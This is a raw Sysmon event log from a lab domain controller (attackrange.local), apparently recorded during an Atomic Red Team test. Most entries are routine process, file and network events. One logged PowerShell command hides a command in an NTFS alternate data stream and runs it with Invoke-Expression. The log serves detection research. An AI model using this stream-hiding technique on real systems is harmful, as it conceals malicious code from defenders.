22:55:41.174{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-70ED-603D-7388-00000000AD01}7268C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697473Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.174{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-70ED-603D-7388-00000000AD01}7268C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001697472Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:55:41.162{05ADC7E1-70ED-603D-7388-00000000AD01}7268\PSHost.132591129410630647.7268.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001697471Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.146{05ADC7E1-70ED-603D-7388-00000000AD01}7268ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_g3rmwpsq.hhx.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697470Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.146{05ADC7E1-70ED-603D-7388-00000000AD01}7268ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_s53ehnts.ep0.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001697469Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.115{05ADC7E1-70ED-603D-7388-00000000AD01}7268C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_s53ehnts.ep0.ps12021-03-01 22:55:41.115 10341000x80000000000000001697468Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.099{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-70ED-603D-7388-00000000AD01}7268C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697467Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.073{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70ED-603D-7388-00000000AD01}7268C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697466Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.052{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70ED-603D-7388-00000000AD01}7268C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 10341000x80000000000000001697465Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.052{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697464Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.052{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697463Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.052{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697462Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.052{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697461Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.052{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-70ED-603D-7388-00000000AD01}7268C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697460Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.052{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70ED-603D-7388-00000000AD01}7268C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001697459Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.063{05ADC7E1-70ED-603D-7388-00000000AD01}7268C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host \""Stream Data Executed\""' -Stream 'streamCommand' $streamcommand = Get-Content -Path $env:TEMP\NTFS_ADS.txt -Stream 'streamcommand' Invoke-Expression $streamcommand} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001697458Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.052{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001697457Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.052{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 23542300x80000000000000001697456Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:41.021{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-err.txtMD5=963D55F0D4A29BF5B1CAC4A81A8FB1B8,SHA256=A55B54804B979D606C029804FB7095F0418296F346EB17158597CB798BB32EED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697540Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:42.802{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=37FF927A92301A35AF1CB72649E42F0E,SHA256=05AAAF2261FA009B290ED8C835E81702A113FE66784E0F00907831FE4BE28D51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697539Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:42.802{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0EB269BA7EA0DD28B0C8454C71BE6D6,SHA256=0D964CD5B6B521DAAC7F8855E5362137C0D918AAD8B6CB3F99F3DFF090D4FC7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697538Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:42.802{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C46CB8518C96742C5952316FA7A58DB5,SHA256=10FE50B036B72C49E59E64F3ACB7AE740602FD97B10B82EACFC740DE1E87634D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697537Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:42.574{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=780C4BC7ADB2E101DD13D37F3F9FC7DF,SHA256=53AF0CE7D1C21F97893B79D718DC03BF12F4B32B9885313338A38C51A3FDDFD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697536Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:42.574{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B88278C24F5AFCEA8FECB343AF327E12,SHA256=EB5CB86AC1DF74181CA3C6C6C9D9897FC42B2170756D1C728A1DC2FE9DDF247F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697535Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:42.572{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=61806C65E4C90F9575AC5464DA69BAD1,SHA256=4B3A05AF5806C603867377C6908274531758829CD90D4A7093F90670CAF75324,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001697534Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:34.420{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local55161-false10.0.1.12-8000- 354300x80000000000000001697533Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:33.872{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-63328-true2001:500:1:0:0:0:0:53h.root-servers.net53domain 23542300x80000000000000001697532Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:42.411{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=413F4CF1D66BB20B3AC6CF3446BA591F,SHA256=10C6B29AAAA7D0C364CD3AF6B589D0183ACFFF6D5A52974EFDA1170BA1AAECA4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697531Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:42.174{05ADC7E1-229F-6039-1400-00000000AD01}13162036C:\Windows\system32\svchost.exe{05ADC7E1-70ED-603D-7488-00000000AD01}5596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x100040C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+63c9|c:\windows\system32\cryptsvc.dll+62d1|c:\windows\system32\cryptsvc.dll+5e56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697530Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:42.115{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697529Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:42.115{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697528Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:42.115{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001697554Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:43.818{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F0B929162D801153EA39246117D998B,SHA256=D5B91008C4226C7A2DC3B1DA64E29EFB6D5D18EAAFD49C24A6848D74FDEC6F8C,IMPHASH=00000000000000000000000000000000falsetrue 